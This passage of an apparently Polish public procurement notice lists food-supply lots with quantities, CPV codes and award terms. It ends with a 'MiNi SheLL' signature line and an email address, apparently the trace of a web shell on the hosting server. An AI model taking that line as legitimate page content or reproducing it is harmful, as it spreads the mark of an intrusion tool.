45	Mak niebieski	 	kg	10		
46	Ziarno sezamu	 	kg	1		
47	Grzyby suszone	 	kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 03.21.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> PAKIET NR 7

DOSTAWA OWOCÓW ŚWIEŻYCH I SUSZONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

l.p	Nazwa artykułu	Sugerowana waga jednostkowa	Jedn. miary	Orient.
ilość
zamówienia	Cena jedn. netto	Wartość netto
1	Arbuz		kg	180		
2	Banany	200g/szt	kg	800		
3	Brzoskwinia 	150g/szt	kg	100		
4	Cytryny		kg	2		
5	Czereśnie		kg	40		
6	Grapefruit	300-400g/szt	kg	100		
7	Jabłka		kg	600		
8	Jabłka deserowe 	200g/szt	kg	500		
9	Jagody		kg	10		
10	Morele		kg	60		
11	Mandarynki	80-100g/szt	kg	150		
12	Nektaryny	150g/szt	kg	30		
13	Owoce kiwi	100-120g/szt	kg	40		
14	Pomarańcze	200g/szt	kg	300		
15	Truskawki świeże		kg	20		
16	Śliwki		kg	250		
17	Śliwki deserowe		kg	200		
18	Winogrona deserowe 		kg	30		
19	Wiśnie		kg	80		
20	Rabarbar		kg	250		
21	Gruszki deserowe		kg	130		
22	Gruszki suszone		kg	2,5		
23	Śliwki suszone bez pestek		kg	6		
24	Jabłka suszone		kg	2,5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9, 15.33.24.10-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> PAKIET NR 8

DOSTAWA WARZYW I OWOCÓW MROŻONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia	Jedn. cena netto	Wartość netto
1	Brokuły 	450g	kg	10		
2	Brokuły 	2000-2500g	kg	40		
3	Brukselka	450g	kg	5		
4	Brukselka	2000-2500g	kg	30		
5	Kalafior	450g	kg	5		
6	Kalafior	2000-2500g	kg	25		
7	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	450g	kg	20		
8	Mieszanka kompotowa (wiśnia, aronia, czarna porzecza, śliwka, truskawka)	2000-2500g	kg	450		
9	Szpinak	450g	kg	5		
10	Szpinak	2000-2500g	kg	100		
11	Truskawki	450g	kg	10		
12	Truskawki	2000-2500g	kg	50		
13	Frytki z tłuszczem	450-2500g	kg	5.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.31.11.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> PAKIET NR 9

DOSTAWA RYB ŚWIEŻYCH, MROŻONYCH I PRZETWORÓW RYBNYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Filety z zielonego śledzia	 	kg	60		
2	Filety z mintaja płaty SHP	 	kg	50		
3	Filety z dorsza płaty, b/skóry, SHP	 	kg	100		
4	Filet z pangi trymowanej płaty, SHP	 	kg	200		
5	Filety z matiasa b/skóry solone	 	kg	60		
6	Filety z matiasa b/skóry solone	150-500g	kg	5		
7	Filety śledziowe w oleju z różnymi dodatkami	 	kg	45		
8	Filety śledziowe w oleju z różnymi dodatkami	150-500g	kg	5		
9	Sałatka z filetów śledziowych w majonezie 	 	kg	35		
10	Sałatka z filetów śledziowych w majonezie 	100-500g	kg	5		
11	Sałatka -krajanka z filetów śledziowych w oleju z różnymi dodatkami	 	kg	25		
12	Sałatka - krajanka z filetów śledziowych w oleju z różnymi dodatkami	100-500g	kg	5		
13	Koreczki śledziowe z różnymi dodatkami	 	kg	30		
14	Koreczki śledziowe z różnymi dodatkami	100-500g	kg	10		
15	Klopsy rybne opiekane w zalewie	1000-3000g	kg	35		
16	Klopsy rybne opiekane w zalewie	100-500g	kg	5		
17	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	 	kg	25		
18	Pasty rybne(z makreli, tuńczyka, łososia itp.) 	50-170g	kg	15		
19	Płaty śledziowe marynowane	2000-4000	kg	65		
20	Płaty śledziowe marynowane	100-500g	kg	5		
21	Makrela wędzona ( tusze)	 	kg	200		
22	Szproty wędzone	 	kg	15		
23	Łosoś wędzony -plastry	 	kg	0,5		
24	Paprykarz*	150-400g	kg	50		
25	Filety rybne w pomidorach o zaw. min.60% mięsa rybnego	150-200g	kg	5		
26	Filety rybne w oleju o zaw.min.60% mięsa rybnego	150-200g	kg	5		
27	Szproty w oleju 	150-200g	kg	40		
28	Tuńczyk w oleju - kawałki	150-200g	kg	30		
29	Śledzie w oleju  o zaw.min.60% mięsa rybnego 	150-200g	kg	20		
30	Śledzie w pomidorach o zaw. min. 60% miesa rybnego.	150-200g	kg	30		
31	Kawior (czarny, czerwony)	50-100g	kg	0,2		
32	Karp patroszony bez głowy 	 	kg	35		
33	Ryba w galarecie	170-200g	kg	15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0, 15.22.00.00-6, 15.21.11.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> PAKIET NR 10

DOSTAWA MIĘSA WIEPRZOWEGO I WOŁOWEGO ORAZ PODROBÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp.	Nazwa artykułu	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość 
netto
1	Boczek bez kości -świeży	kg	10		
2	Flaki wołowe parzone cięte (mrożone)	kg	50		
3	Karczek wp. bez kości- świeży	kg	40		
4	Łopatka  bez kości- świeża	kg	800		
5	Mięso mielone wieprzowo-wołowe-świeże	kg	10		
6	Nóżki wieprzowe świeże	kg	60		
7	Ozory wieprzowe świeże	kg	50		
8	Płuca wieprzowe świeże	kg	60		
9	Schab wp.bez kości -świeży	kg	200		
10	Słonina mielona świeża	kg	35		
11	Wołowe bez kości - ekstra świeże	kg	80		
12	Wołowe z kością -antrykot świeże	kg	150		
13	Żeberka wieprzowe paski świeże	kg	80.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.00.00-2, 15.11.40.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> PAKIET NR 11

DOSTAWA MIĘSA I PODROBÓW DROBIOWYCH ŚWIEŻYCH I MROŻONYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

Lp	Nazwa artykułu	Sugerowana waga jednostkowa 	Jm.	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Kurczaki świeże	1500g	kg	90		
2	Porcje rosołowe mrożone -paczkowane	1000g-1500g	kg	370		
3	Serca drobiowe świeże (z indyka )		kg	50		
4	Udka z kurczaka - ćwiartki - świeże	350-400g	kg	100		
5	Wątróbka drobiowa świeża (z kurczaka )		kg	70		
6	Żołądki drobiowe świeże (z indyka) 		kg	80		
7	Filety z kurczaka-świeże		kg	110		
8	Filety z indyka - świeże		kg	80		
9	Podudzie z kurczaka - świeże	150g-180g	kg	250		
10	Udziec z kurczaka bez kości -świeży	130-180g	kg	200		
11	Udziec z kurczaka z kością -świeży	150-180g	kg	40.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6, 15.11.23.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 12 <b>NAZWA:</b> PAKIET NR 12

DOSTAWA WĘDLIN.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


LP	Nazwa artykułu	Nazwa własna*	

Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Baleron gotowany		kg	40		
2	Blok drobiowy 		kg	35		
3	Blok wieprzowy 		kg	105		
4	Boczek rolowany faszerowany		kg	70		
5	Boczek surowy wędzony paski bez kości, 		kg	130		
6	Filet z indyka wędzony, pieczony - płat		kg	20		
7	Frankfuterki surowe, wędzone wieprzowe		kg	20		
8	Galareta mięsna wieprzowa		kg	20		
9	Kiełbasa biała wp. parzona		kg	40		
10	Kiełbasa podsuszana wp. grubo mielona-kanapkowa 		kg	110		
11	Kiełbasa wp. parówkowa		kg	200		
12	Kiełbasa surowa wp. wędzona		kg	20		
13	Kiełbasa swojska wp.pieczona - cienka		kg	110		
14
	Kiełbasa wp.grubo mielona, parzona - kanapkowa 		kg	130		
15	Kiełbasa wp.szynkowa		kg	120		
16	Kiełbasa śląska drobiowa		kg	70		
17	Kiełbasa śląska wieprzowa		kg	100		
18	Kiełbasa toruńska		kg	100		
19	Kiełbasa wp.zwyczajna		kg	120		
20	Kiełbaski wp.z serem		kg	70		
21	Krupniok śląski		kg	70		
22	Bułczanka		kg	40		
23	Metka wp. grubo mielona podwędzana		kg	80		
24	Metka smakowa (cebulowa, tatarska, łososiowa)		kg	40		
25	Mielonka wp.		kg	55		
26	Mortadela wieprzowa		kg	105		
27	Ogonówka parzona		kg	140		
28	Parówki drobiowe		kg	230		
29	Parówki wp.śląskie		kg	200		
30	Pasztetowa popularna		kg	30		
31	Pasztetowa podwędzana		kg	60		
32	Polędwica sopocka 		kg	90		
33	Polędwica z indyka		kg	40		
34	Rolada drobiowa faszerowana 		kg	110		
35	Salami wp.szlachetne		kg	20		
36	Salceson jasny		kg	70		
37	Salceson ozorkowy		kg	60		
38	Szynka drobiowa 		kg	20		
39	Szynka gotowana wieprzowa		kg	40		
40	Szynka konserwowa wieprzowa		kg	90		
41	Szynka wieprzowa w galarecie z warzywami		kg	40		
42	Szynka wp. wiejska, swojska itp. 		kg	40		
43	Tymbaliki drobiowe 		kg	10.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 13 <b>NAZWA:</b> PAKIET NR 13

DOSTAWA JAJ KURZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA


l.p.	Nazwa artykułu	Sugerowana
waga jajka	Jm	Orientacyjna ilość	Cena jedn. netto	Wartość netto
1	Jaja kurze	63g-73g L	szt	15000.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.14.25.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 14 <b>NAZWA:</b> PAKIET NR 14

DOSTAWA CZEKOLAD I WYROBÓW CUKIERNICZYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

l.p.	Nazwa artykułu	Sugerowana wielkość opakowania	Jm	Orientacyjna
Ilość zamówienia
	Cena jedn. netto	Wartość netto
1	Biszkopty	250-500g	kg	60		
2	Bombonierka - czekoladki nadziewane 	150-200g	kg	15		
3	Cukierki czekoladowe typu buławki, michałki lub równoważne 	luz	kg	15		
4	Mieszanka czekoladowa opakowanie świąteczne 	250-350g	kg	37		
5	Ciastka maślane 	800-2500g	kg	35		
6	Ciastka maślane 	100-150g	kg	10		
7	Ciastka deserowe - kakaowe,
z cukrem, 
z kokosem itp.	800-2500g	kg	12		
8	Ciastka deserowe oblewane czekoladą	800-2500g	kg	5		
9	Ciasteczka deserowe 
z nadzieniem owocowym, kremowym	800-2500g	kg	25		
10	Pierniki w czekoladzie (serca, gwiazdy, precle)	400-500g	kg	55		
11	Pierniki nadziewane 
w czekoladzie	800-2500g	kg	10		
12	Kostka marcepanowo-piernikowa z galaretką w czekoladzie	100-150g	kg	14		
13	Biszkopty 
z galaretką 
w czekoladzie	800-1000g	kg	20		
14	Galaretka 
w czekoladzie	1000g	kg	5		
15	Praliny nadziewane min. 40%masy kakaowej	1000g	kg	10		
16	Czekolada deserowa bezcukrowa	100g	szt	60		
17	Czekolada mleczna nadziewana świąteczna min. 30% masy kakaowej	100g	szt	110		
18	Czekolada mleczna min.30% masy kakaowej	100g	szt	60		
19	Herbatniki bezcukrowe 	70g-150g	kg	20		
20	Wafelki bezcukrowe	70-150g	kg	12		
21	Zestaw świąteczny z mikołajem w czekoladzie mlecznej 	100g	szt	150.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.84.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 15 <b>NAZWA:</b> PAKIET NR 15

DOSTAWA NAPOJÓW BEZALKOHOLOWYCH.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> OPIS PRZEDMIOTU ZAMÓWIENIA

l.p.	Nazwa artykułu	Sugerowana waga jednostkowa	Jm	Orientacyjna ilość zamówienia	Cena jedn. netto	Wartość netto
1	Napoje owocowe pasteryzowane n/gaz min. 25% soku 	1000 -2000ml	l	550		
2	Soki owocowo-warzywne 100% przecierowe, 	250-330ml	l	210		
3	Soki owocowo - warzywne 100% przecierowe, 	750-1000ml	l	200		
4	Syrop wysokosłodzony	330-500ml	l	20		
5	Woda mineralna gazow./niegaz.	1500 ml	szt	20		
6	Soczki owocowe ze słomką, 	200-250ml	l	5		
7	Piwo ciemne bezalkoholowe 	500ml	l	4		
8	Soki owocowe 100%	1000ml	l	50.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.98.00.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 6.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com